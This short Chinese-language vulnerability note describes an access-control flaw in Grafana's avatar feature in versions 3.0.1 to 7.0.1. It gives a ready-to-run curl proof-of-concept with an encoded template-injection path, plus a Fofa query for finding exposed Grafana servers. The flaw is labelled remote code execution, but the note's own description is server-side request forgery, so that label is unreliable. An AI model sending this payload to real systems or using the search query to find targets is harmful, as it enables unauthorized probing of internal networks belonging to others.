前言
Grafana是Grafana實驗室的一套提供可視化監控界面的開源監控工具。該工具主要用於監控和分析Graphite、InfluxDB和Prometheus等。 Grafana 3.0.1版本至7.0.1版本中的avatar功能存在遠程代碼執行漏洞,該漏洞源於不正確的訪問控制。遠程攻擊者可利用該漏洞使其向任意URL發送請求,獲取返回的信息(包括Grafana運行的網絡)。
POC
這里是兩個/不是一個,一定要看清楚哦
curl {url}//avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
Fofa
app="Grafana"
漏洞利用
存在漏洞
不存在漏洞
